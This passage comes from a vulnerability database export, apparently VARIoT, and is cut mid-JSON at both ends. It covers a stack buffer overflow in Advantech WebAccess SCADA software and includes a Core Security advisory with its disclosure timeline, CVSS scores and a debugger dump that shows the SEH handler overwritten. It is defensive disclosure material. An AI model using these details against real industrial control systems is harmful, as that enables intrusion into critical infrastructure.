"CNNVD", "id": "CNNVD-201202-415" }, { "db": "NVD", "id": "CVE-2012-0239" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0668" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53520" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-415" }, { "date": "2012-02-21T13:31:57.127000", "db": "NVD", "id": "CVE-2012-0239" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0668" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53520" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-415" }, { "date": "2024-11-21T01:34:38.597000", "db": "NVD", "id": "CVE-2012-0239" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-415" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of uaddUpAdmin.asp Vulnerabilities in changing administrator passwords", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001557" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-415" } ], "trust": 0.6 } }
var-201409-0446
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the password parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0446", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "CNNVD", "id": "CNNVD-201409-739" }, { "db": "NVD", "id": "CVE-2014-0992" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004359" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69538" } ], "trust": 0.3 }, "cve": "CVE-2014-0992", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0992", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05416", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d2889864-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "37943294-1ec1-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68485", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0992", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0992", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05416", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-739", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68485", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0992", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "VULHUB", "id": "VHN-68485" }, { "db": "VULMON", "id": "CVE-2014-0992" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "CNNVD", "id": "CNNVD-201409-739" }, { "db": "NVD", "id": "CVE-2014-0992" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the password parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0992" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "BID", "id": "69538" }, { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68485" }, { "db": "VULMON", "id": "CVE-2014-0992" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 3.06 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0992", "trust": 4.0 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.2 }, { "db": "BID", "id": "69538", "trust": 2.1 }, { "db": "CNNVD", "id": "CNNVD-201409-739", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-05416", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-004359", "trust": 0.8 }, { "db": "OSVDB", "id": "110687", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D2889864-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "37943294-1EC1-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68485", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-0992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "VULHUB", "id": "VHN-68485" }, { "db": "VULMON", "id": "CVE-2014-0992" }, { "db": "BID", "id": "69538" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-739" }, { "db": "NVD", "id": "CVE-2014-0992" } ] }, "id": "VAR-201409-0446", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "VULHUB", "id": "VHN-68485" } ], "trust": 1.53470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05416" } ] }, "last_update_date": "2024-11-23T22:38:56.117000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05416)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53298" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "CNNVD", "id": "CNNVD-201409-739" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68485" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "NVD", "id": "CVE-2014-0992" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.3, "url": "http://www.securityfocus.com/bid/69538" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0992" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0992" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/110687" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": 